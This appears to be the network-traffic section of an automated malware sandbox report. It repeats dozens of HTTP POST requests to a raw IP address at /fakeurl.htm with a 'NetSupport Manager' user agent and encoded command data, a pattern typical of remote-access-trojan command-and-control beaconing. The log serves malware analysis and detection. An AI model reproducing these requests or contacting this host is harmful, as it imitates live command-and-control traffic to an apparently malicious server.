                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:37.824909925 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:37.925709963 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:38.026619911 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:38.226711035 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:38.327646017 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:38.427813053 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:38.528703928 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:38.629709959 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:38.730710983 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:38.830879927 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:38.931729078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:39.031928062 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:39.132771015 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:39.233721972 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:39.333903074 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:39.434638023 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:39.534579992 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:39.635726929 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:39.735619068 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:39.835644007 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:39.935641050 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:40.036622047 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:40.136627913 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:40.251646996 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:40.451865911 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:40.552634001 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:40.652656078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:40.753758907 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:40.853691101 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:40.953915119 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:41.055001020 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:41.155704021 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:41.256637096 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:41.356697083 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:41.457824945 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:41.557857037 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:41.657962084 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:41.758874893 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:41.859807968 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:41.959856033 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:42.060775042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:42.161739111 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:42.262773991 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:42.362719059 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:42.462647915 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:42.563657999 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:42.663698912 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:42.763617039 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:42.863917112 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:42.964767933 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:43.064893007 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:43.165679932 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:43.266644955 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:43.366656065 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:43.467797995 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:43.567974091 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:43.668706894 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:43.769675970 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:43.870719910 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:43.970624924 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:44.071665049 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:44.172559023 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:44.273732901 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:44.373609066 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:44.474695921 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:44.574918985 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:44.675602913 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:44.788156986 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:44.887758970 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:44.988761902 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:45.404427052 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
